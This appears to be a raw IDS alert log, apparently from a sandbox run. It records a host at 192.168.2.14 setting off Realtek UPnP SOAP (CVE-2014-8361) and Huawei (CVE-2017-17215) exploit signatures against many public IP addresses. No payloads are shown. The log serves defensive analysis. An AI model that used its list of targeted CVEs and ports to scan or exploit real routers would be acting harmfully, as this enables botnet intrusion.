                                                07/20/24-23:05:52.485640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25574852869192.168.2.1473.39.239.240
                                                07/20/24-23:06:03.747455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998837215192.168.2.1441.68.205.199
                                                07/20/24-23:06:07.283476TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5256052869192.168.2.14189.32.36.162
                                                07/20/24-23:05:40.365973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3840452869192.168.2.1473.48.25.59
                                                07/20/24-23:05:39.055909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654037215192.168.2.14197.39.59.59
                                                07/20/24-23:05:59.081357TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25964652869192.168.2.1470.188.135.27
                                                07/20/24-23:05:58.929504TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616066652869192.168.2.14117.34.159.68
                                                07/20/24-23:05:59.333647TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614191852869192.168.2.14189.34.115.204
                                                07/20/24-23:05:36.324524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336837215192.168.2.1470.62.163.57
                                                07/20/24-23:06:05.500663TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615780452869192.168.2.14147.116.212.99
                                                07/20/24-23:05:34.660344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644437215192.168.2.1450.34.155.192
                                                07/20/24-23:07:28.049580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952652869192.168.2.1431.80.56.65
                                                07/20/24-23:05:37.449068TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24341452869192.168.2.14103.132.88.33
                                                07/20/24-23:05:33.829338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539237215192.168.2.14157.233.53.190
                                                07/20/24-23:05:57.152960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5716052869192.168.2.14121.202.104.123
                                                07/20/24-23:06:03.297548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5360052869192.168.2.1448.138.205.15
                                                07/20/24-23:05:40.435340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5216852869192.168.2.14223.83.31.67
                                                07/20/24-23:06:07.310437TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614734852869192.168.2.144.132.221.115
                                                07/20/24-23:06:11.535629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4338252869192.168.2.14103.142.215.217
                                                07/20/24-23:05:40.365973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24938852869192.168.2.1474.88.51.163
                                                07/20/24-23:05:35.292228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4367452869192.168.2.1498.74.12.225
                                                07/20/24-23:05:42.237871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3580037215192.168.2.1441.189.225.89
                                                07/20/24-23:07:32.121311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23892252869192.168.2.14186.153.223.147
                                                07/20/24-23:06:07.422962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544437215192.168.2.14151.116.92.99
                                                07/20/24-23:05:57.851101TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615258252869192.168.2.1499.63.100.144
                                                07/20/24-23:05:45.460569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795437215192.168.2.1457.203.241.201
                                                07/20/24-23:05:44.686584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24346852869192.168.2.14118.15.81.240
                                                07/20/24-23:05:44.796964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4183052869192.168.2.1466.110.133.249
                                                07/20/24-23:05:57.164358TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5323852869192.168.2.1432.217.101.126
                                                07/20/24-23:06:01.293209TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25350652869192.168.2.14124.138.24.130
                                                07/20/24-23:06:03.180597TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601852869192.168.2.1477.177.17.23
                                                07/20/24-23:06:01.285913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615885452869192.168.2.14219.6.222.246
                                                07/20/24-23:05:48.762153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979037215192.168.2.14197.224.167.108
                                                07/20/24-23:05:40.440618TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24677852869192.168.2.14157.151.72.129
                                                07/20/24-23:05:57.982999TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614717852869192.168.2.1496.70.6.41
                                                07/20/24-23:05:44.342053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5698852869192.168.2.14132.228.159.81
                                                07/20/24-23:05:47.120793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435637215192.168.2.14197.228.20.160
                                                07/20/24-23:06:22.041924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6006652869192.168.2.14178.70.56.53
                                                07/20/24-23:05:57.934535TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6016252869192.168.2.14190.92.119.202
                                                07/20/24-23:05:59.708489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5143452869192.168.2.14174.36.34.226
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688237215192.168.2.14197.26.201.125
                                                07/20/24-23:06:13.612988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4798652869192.168.2.1482.244.199.195
                                                07/20/24-23:05:59.472881TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25068452869192.168.2.1497.30.113.63
                                                07/20/24-23:07:28.049580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615588652869192.168.2.1437.20.126.185
                                                07/20/24-23:05:57.551205TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3484852869192.168.2.1489.30.212.13
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872037215192.168.2.14157.12.47.227
                                                07/20/24-23:05:36.040620TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3436452869192.168.2.14172.126.0.115
                                                07/20/24-23:06:00.581239TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24810052869192.168.2.14181.39.217.252
                                                07/20/24-23:06:29.433951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5038252869192.168.2.14160.32.94.148
                                                07/20/24-23:05:57.606361TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615626652869192.168.2.14221.205.117.86
                                                07/20/24-23:05:59.109608TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6096052869192.168.2.1478.124.39.8
                                                07/20/24-23:05:35.815974TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615683652869192.168.2.14193.85.31.138
                                                07/20/24-23:05:36.327823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809837215192.168.2.14157.231.34.207
                                                07/20/24-23:05:38.750662TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615187452869192.168.2.1448.109.149.149
                                                07/20/24-23:05:47.125782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078837215192.168.2.1441.57.242.76
                                                07/20/24-23:06:53.637724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614652869192.168.2.1498.219.161.225
                                                07/20/24-23:05:44.364114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524652869192.168.2.14198.53.78.79
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884237215192.168.2.14157.241.104.134
                                                07/20/24-23:05:47.499623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4668252869192.168.2.14213.18.175.220
                                                07/20/24-23:05:46.284824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615574052869192.168.2.14159.81.180.197
                                                07/20/24-23:06:00.171719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3454852869192.168.2.1478.127.105.181
                                                07/20/24-23:05:52.539655TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5422052869192.168.2.1412.205.1.20
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168837215192.168.2.14101.226.44.90
                                                07/20/24-23:05:59.127021TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23877052869192.168.2.1439.213.19.113
                                                07/20/24-23:05:58.394422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961852869192.168.2.14135.7.73.21
                                                07/20/24-23:06:25.985417TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614504252869192.168.2.14101.143.94.90
                                                07/20/24-23:05:56.446227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623037215192.168.2.1444.62.7.164
                                                07/20/24-23:06:09.588800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4731852869192.168.2.14112.6.123.48
                                                07/20/24-23:05:44.337765TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615905252869192.168.2.14120.138.189.24
                                                07/20/24-23:06:17.581336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5246652869192.168.2.14206.154.165.136
                                                07/20/24-23:05:40.426800TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24289252869192.168.2.1492.201.144.62
                                                07/20/24-23:05:47.281162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4106052869192.168.2.14179.97.101.3
                                                07/20/24-23:05:45.424850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409237215192.168.2.14157.117.39.181
                                                07/20/24-23:05:33.859349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873837215192.168.2.14197.38.240.133
                                                07/20/24-23:05:34.659618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974237215192.168.2.14197.152.249.5
                                                07/20/24-23:05:57.136226TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24115452869192.168.2.14183.154.100.223
                                                07/20/24-23:05:57.830942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5688652869192.168.2.148.163.140.146
                                                07/20/24-23:06:09.675613TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614333452869192.168.2.14193.194.227.213
                                                07/20/24-23:05:56.402930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044437215192.168.2.14197.158.86.187
                                                07/20/24-23:06:15.183242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4607852869192.168.2.14170.158.29.228
                                                07/20/24-23:05:35.489677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615758252869192.168.2.14119.225.48.58
                                                07/20/24-23:05:40.475273TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4770052869192.168.2.14183.13.10.198
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946437215192.168.2.14197.49.120.233
                                                07/20/24-23:05:57.947146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614972252869192.168.2.1497.30.113.63
                                                07/20/24-23:05:45.130220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5453452869192.168.2.1499.220.189.230
                                                07/20/24-23:05:46.549584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616056452869192.168.2.1498.8.249.105
                                                07/20/24-23:05:48.773442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561037215192.168.2.14197.48.232.49
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056837215192.168.2.14157.113.23.58
                                                07/20/24-23:05:59.453008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4534652869192.168.2.1427.77.179.71
                                                07/20/24-23:06:18.744447TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613540252869192.168.2.14153.95.32.34
                                                07/20/24-23:05:40.407056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4649252869192.168.2.14114.248.97.56
                                                07/20/24-23:05:42.237871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5962637215192.168.2.14197.62.41.222
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280037215192.168.2.14197.122.120.132
                                                07/20/24-23:05:52.546680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3409452869192.168.2.1498.8.249.105
                                                07/20/24-23:05:45.062886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5565452869192.168.2.1457.176.228.98
                                                07/20/24-23:06:01.888773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4211052869192.168.2.1461.195.84.60
                                                07/20/24-23:05:45.392755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503037215192.168.2.14197.241.165.77
                                                07/20/24-23:05:47.108564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644437215192.168.2.1441.191.4.243
                                                07/20/24-23:06:12.647376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4047252869192.168.2.14183.168.204.172
                                                07/20/24-23:06:11.425707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4453052869192.168.2.14165.67.93.131
                                                07/20/24-23:06:08.513489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4103452869192.168.2.14199.168.202.86
                                                07/20/24-23:05:40.430092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5844452869192.168.2.1443.253.131.181
                                                07/20/24-23:05:45.392755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689037215192.168.2.14157.14.89.203
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290237215192.168.2.14157.246.21.11
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622437215192.168.2.1441.38.16.120
                                                07/20/24-23:05:33.829338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925237215192.168.2.14157.148.29.80
                                                07/20/24-23:05:45.409134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377437215192.168.2.14157.113.28.155
                                                07/20/24-23:05:46.381513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6084252869192.168.2.14181.238.128.43
                                                07/20/24-23:05:57.904970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4103052869192.168.2.14191.73.229.109
                                                07/20/24-23:05:56.993302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4135052869192.168.2.14107.117.156.40
                                                07/20/24-23:05:46.305924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4921052869192.168.2.14219.121.248.52
                                                07/20/24-23:05:37.456840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5946252869192.168.2.1459.165.217.161
                                                07/20/24-23:07:03.123324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4842852869192.168.2.148.154.253.124
                                                07/20/24-23:06:03.084394TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4723652869192.168.2.14156.142.205.241
                                                07/20/24-23:05:46.064615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805637215192.168.2.1481.99.224.85
                                                07/20/24-23:06:03.058977TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24217452869192.168.2.1485.57.174.44
                                                07/20/24-23:06:17.501695TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615935052869192.168.2.1469.227.93.244
                                                07/20/24-23:06:18.886041TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24215452869192.168.2.1454.94.45.4
                                                07/20/24-23:06:37.871435TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613631452869192.168.2.1492.17.141.87
                                                07/20/24-23:05:37.453622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4921252869192.168.2.1437.154.117.198
                                                07/20/24-23:06:05.658836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3637252869192.168.2.14131.148.44.75
                                                07/20/24-23:06:02.663981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3620652869192.168.2.14111.159.251.81
                                                07/20/24-23:06:03.405139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3488237215192.168.2.14197.184.171.197
                                                07/20/24-23:06:25.634766TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3714852869192.168.2.1489.152.172.93
                                                07/20/24-23:05:52.531088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25746452869192.168.2.14184.34.105.168
                                                07/20/24-23:06:00.099234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4704452869192.168.2.14100.130.98.116
                                                07/20/24-23:06:19.756250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5950452869192.168.2.1442.26.193.251
                                                07/20/24-23:05:45.429987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223437215192.168.2.1491.215.7.123
                                                07/20/24-23:05:47.704882TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615467252869192.168.2.14161.253.199.89
                                                07/20/24-23:05:57.587244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614884452869192.168.2.1458.234.91.201
                                                07/20/24-23:05:45.792506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3553252869192.168.2.14203.182.119.62
                                                07/20/24-23:05:45.412131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939437215192.168.2.1442.154.88.136
                                                07/20/24-23:05:57.830942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4759052869192.168.2.14152.47.45.245
                                                07/20/24-23:05:56.250145TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615191652869192.168.2.1467.18.202.14
                                                07/20/24-23:06:29.771660TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614733852869192.168.2.1483.126.117.245
                                                07/20/24-23:05:39.054227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732837215192.168.2.14157.247.21.120
                                                07/20/24-23:06:00.768266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4852852869192.168.2.1425.197.167.180
                                                07/20/24-23:05:59.333908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5800852869192.168.2.1489.31.185.148
                                                07/20/24-23:07:26.028529TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615102452869192.168.2.1434.38.81.91
                                                07/20/24-23:06:00.208694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614361852869192.168.2.14217.27.23.121
                                                07/20/24-23:05:52.502632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5749052869192.168.2.14159.81.180.197
                                                07/20/24-23:05:57.678099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614322252869192.168.2.14173.94.91.109
                                                07/20/24-23:05:57.179441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709652869192.168.2.14199.172.167.2
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293037215192.168.2.1453.9.120.228
                                                07/20/24-23:05:57.854779TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614476652869192.168.2.14175.170.231.7
                                                07/20/24-23:05:40.325934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23794052869192.168.2.14175.146.247.15
                                                07/20/24-23:06:50.167569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4137252869192.168.2.14203.193.57.242
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290437215192.168.2.14136.47.60.180
                                                07/20/24-23:05:58.354369TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25418852869192.168.2.14167.208.176.195
                                                07/20/24-23:06:33.055161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614852869192.168.2.14185.178.75.65
                                                07/20/24-23:06:07.518543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801237215192.168.2.14183.58.128.182
                                                07/20/24-23:06:11.251823TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615400652869192.168.2.1448.215.144.137
                                                07/20/24-23:06:21.994838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5749252869192.168.2.14122.46.154.215
                                                07/20/24-23:05:44.488760TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605452869192.168.2.1499.215.247.10
                                                07/20/24-23:06:01.824928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3523052869192.168.2.14172.216.136.43
                                                07/20/24-23:06:01.842190TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615566652869192.168.2.14169.21.93.225
                                                07/20/24-23:05:45.076298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5210652869192.168.2.14146.2.42.140
                                                07/20/24-23:06:11.223856TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615007852869192.168.2.1465.72.189.242
                                                07/20/24-23:05:52.633205TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5373852869192.168.2.14154.72.172.164
                                                07/20/24-23:05:39.654418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615302452869192.168.2.14154.217.235.162
                                                07/20/24-23:05:57.568828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3914652869192.168.2.1424.224.16.219
                                                07/20/24-23:05:48.801547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840237215192.168.2.1490.143.159.0
                                                07/20/24-23:05:59.128245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4965052869192.168.2.1490.121.47.125
                                                07/20/24-23:06:25.985417TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3608452869192.168.2.14203.104.19.10
                                                07/20/24-23:06:27.674364TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3296652869192.168.2.14140.180.17.66
                                                07/20/24-23:06:08.154674TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615126452869192.168.2.14197.174.120.97
                                                07/20/24-23:05:39.060021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458637215192.168.2.1475.242.188.72
                                                07/20/24-23:05:57.556241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6080852869192.168.2.141.65.215.231
                                                07/20/24-23:05:52.475330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4359252869192.168.2.14139.106.80.144
                                                07/20/24-23:05:59.443719TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615065052869192.168.2.14204.213.243.95
                                                07/20/24-23:05:57.584377TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615746252869192.168.2.14218.181.218.187
                                                07/20/24-23:05:36.590112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892037215192.168.2.1441.116.190.228
                                                07/20/24-23:05:40.392392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24750652869192.168.2.14190.0.225.28
                                                07/20/24-23:06:07.479533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3900252869192.168.2.1492.93.225.148
                                                07/20/24-23:06:23.035057TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614145452869192.168.2.1440.170.192.203
